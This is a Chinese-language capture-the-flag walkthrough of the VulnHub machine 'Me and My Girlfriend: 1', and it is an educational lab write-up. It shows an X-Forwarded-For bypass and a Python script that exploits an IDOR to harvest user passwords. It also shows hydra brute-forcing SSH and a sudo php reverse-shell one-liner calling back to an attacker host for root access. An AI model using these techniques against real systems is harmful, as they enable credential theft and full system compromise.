Me-and-My-Girlfriend-1

• Me-and-My-Girlfriend-1
• 1 資訊收集
  • 1.1 埠掃描
  • 1.2 後臺目錄掃描
    • 1.2.1 目錄分析
• 2 GetShell
  • 2.1 利用收集的資訊嘗試ssh登入目標主機
  • 2.2 成功登入
• 3 提權
  • 3.1 嘗試提權
  • 3.2 收集當前系統資訊
  • 3.3 sudo php提權

下載地址：Me and My Girlfriend: 1 ~ VulnHub

1 資訊收集

1.1 埠掃描

┌──(kali㉿kali)-[~]
└─$ nmap -sV -T4 -p - 192.168.0.3                 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-07 19:54 CST
Nmap scan report for 192.168.0.3
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 

1.2 後臺目錄掃描

┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.0.3/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

[20:43:35] Starting: 
[20:43:35] 301 -  308B  - /misc  ->  http://192.168.0.3/misc/
[20:43:38] 301 -  310B  - /config  ->  http://192.168.0.3/config/
[20:56:50] 200 -  120B  - /index.php
[20:56:58] 200 -   32B  - /robots.txt
[20:47:35] 403 -  291B  - /server-status

Task Completed
 

1.2.1 目錄分析

1. 訪問http://192.168.0.3/發現有IP限制，檢視頁面程式碼資訊，發現需要利用X-Forwarded-For Header繞過

2. 火狐下載外掛：X-Forwarded-For Header，並配置IP地址為：127.0.0.1，請求頭選擇X-Forwarded-For

3. 利用X-Forwarded-For Header外掛成功訪問到目標網站：http://192.168.0.3/?page=index

4. 在目標網站上註冊test使用者

5. 成功登入後臺：http://192.168.0.3/index.php?page=dashboard

6. 在http://192.168.0.3/index.php?page=profile&user_id=12

   頁面嘗試水平越權，將user_id=12改為user_id=1

   # 通過水平越權得到註冊的使用者資訊如下：
   Eweuh Tandingan
   eweuhtandingan
   skuyatuh
   

7. 編寫指令碼嘗試獲取所有使用者的賬號密碼：

   import requests, re
   
   
   def get_user_pass(uid):
       uid = uid
       t_url = 'http://192.168.0.3/index.php?page=profile&user_id=%s' % uid
       t_cookie = {
           "PHPSESSID":"ua2kg2n1inkvdbdcohitotsgg5"
       }
       t_headers = {"X-Forwarded-For":"127.0.0.1"}
       getreq = requests.get(url=t_url, cookies=t_cookie,headers=t_headers).text
       # match name
       getname = re.search( "id=\"name\" value=\"(.*?)\">",getreq).group(1)
       # match username
       getusername = re.search( "id=\"username\" value=\"(.*?)\">",getreq).group(1)
       # match passwd
       getpasswd = re.search( "id=\"password\" value=\"(.*?)\">",getreq).group(1)
       return getname,getusername,getpasswd
   if __name__ == '__main__':
       for i in range(20):
           getname,getusername,getpasswd = get_user_pass(i)
           if getname:
               print("%s:%s"%(getusername,getpasswd))
   

8. 得到以下結果：

   eweuhtandingan:skuyatuh
   aingmaung:qwerty!!!
   sundatea:indONEsia
   sedihaingmah:cedihhihihi
   alice:4lic3
   abdikasepak:dorrrrr
   test:Admin123
   

9. http://192.168.0.3/robots.txt

10. http://192.168.0.3/heyhoo.txt

2 GetShell

2.1 利用收集的資訊嘗試ssh登入目標主機

# hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -C user-pass ssh://192.168.0.3

# 得到：ssh登入賬號與密碼
alice:4lic3

• -C： FILE 檔案格式為 "login:pass"

2.2 成功登入

# 獲得第一個flag
alice@gfriEND:~$ cat .my_secret/flag1.txt 
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!

Now your last job is get access to the root and read the flag ^_^

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}

3 提權

3.1 嘗試提權

sudo su -提權失敗

3.2 收集當前系統資訊

1. 檢視/etc/passwd

   root:x:0:0:root:/root:/bin/bash
   daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
   bin:x:2:2:bin:/bin:/usr/sbin/nologin
   sys:x:3:3:sys:/dev:/usr/sbin/nologin
   sync:x:4:65534:sync:/bin:/bin/sync
   games:x:5:60:games:/usr/games:/usr/sbin/nologin
   man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
   lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
   mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
   news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
   uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
   proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
   www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
   backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
   list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
   irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
   gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
   nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
   libuuid:x:100:101::/var/lib/libuuid:
   syslog:x:101:104::/home/syslog:/bin/false
   messagebus:x:102:106::/var/run/dbus:/bin/false
   landscape:x:103:109::/var/lib/landscape:/bin/false
   alice:x:1000:1001:Alice Geulis,1337,+62,+62:/home/alice:/bin/bash
   eweuhtandingan:x:1001:1002:,,,:/home/eweuhtandingan:/bin/bash
   aingmaung:x:1002:1003:,,,:/home/aingmaung:/bin/bash
   sundatea:x:1003:1004:,,,:/home/sundatea:/bin/bash
   sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
   mysql:x:105:113:MySQL Server,,,:/var/lib/mysql:/bin/false
   

2. SUID提權：沒啥可利用的

   alice@gfriEND:~$ find / -perm -u=s 2>/dev/null
   /bin/ping6
   /bin/ping
   /bin/umount
   /bin/mount
   /bin/su
   /bin/fusermount
   /usr/bin/chsh
   /usr/bin/gpasswd
   /usr/bin/mtr
   /usr/bin/pkexec
   /usr/bin/at
   /usr/bin/traceroute6.iputils
   /usr/bin/passwd
   /usr/bin/chfn
   /usr/bin/newgrp
   /usr/bin/sudo
   /usr/sbin/uuidd
   /usr/sbin/pppd
   /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   /usr/lib/eject/dmcrypt-get-device
   /usr/lib/openssh/ssh-keysign
   /usr/lib/policykit-1/polkit-agent-helper-1
   

3. 檢視當前系統中的使用者所建立的檔案：沒啥東東

   alice@gfriEND:~$ find / -user 1000  2>/dev/null
   /home/alice
   /home/alice/.bashrc
   /home/alice/.cache
   /home/alice/.cache/motd.legal-displayed
   /home/alice/.bash_logout
   /home/alice/.bash_history
   /home/alice/.profile
   /home/alice/.my_secret
   /home/alice/.my_secret/my_notes.txt
   alice@gfriEND:~$ find / -user 1001 2>/dev/null
   /home/eweuhtandingan
   /home/eweuhtandingan/.bashrc
   /home/eweuhtandingan/.bash_logout
   /home/eweuhtandingan/.profile
   alice@gfriEND:~$ find / -user 1002 2>/dev/null
   /home/aingmaung
   /home/aingmaung/.bashrc
   /home/aingmaung/.bash_logout
   /home/aingmaung/.profile
   alice@gfriEND:~$ find / -user 1003 2>/dev/null
   /home/sundatea
   /home/sundatea/.bashrc
   /home/sundatea/.bash_logout
   /home/sundatea/.profile
   alice@gfriEND:~$ 
   

4. 查詢敏感檔案

   alice@gfriEND:/var/www/html$ cat config/config.php 
   <?php
   
       $conn = mysqli_connect('localhost', 'root', 'ctf_pasti_bisa', 'ceban_corp');
   alice@gfriEND:/var/www/html$ 
   

5. 檢視當前alice使用者是否擁有sudo許可權

   alice@gfriEND:~$ sudo -l
   Matching Defaults entries for alice on gfriEND:
       env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
   
   User alice may run the following commands on gfriEND:
       (root) NOPASSWD: /usr/bin/php
   

3.3 sudo php提權

alice@gfriEND:~$ sudo php -r '$sock=fsockopen("192.168.0.2",2333);exec("/bin/bash -i <&3 >&3 2>&3");'
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 2333
listening on [any] 2333 ...
connect to [192.168.0.2] from (UNKNOWN) [192.168.0.3] 57734
root@gfriEND:~# cat flag2.txt 

  ________        __    ___________.__             ___________.__                ._.
 /  _____/  _____/  |_  \__    ___/|  |__   ____   \_   _____/|  | _____     ____| |
/   \  ___ /  _ \   __\   |    |   |  |  \_/ __ \   |    __)  |  | \__  \   / ___\ |
\    \_\  (  <_> )  |     |    |   |   Y  \  ___/   |     \   |  |__/ __ \_/ /_/  >|
 \______  /\____/|__|     |____|   |___|  /\___  >  \___  /   |____(____  /\___  /__
        \/                              \/     \/       \/              \//_____/ \/

Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)

Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73

Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
root@gfriEND:/root#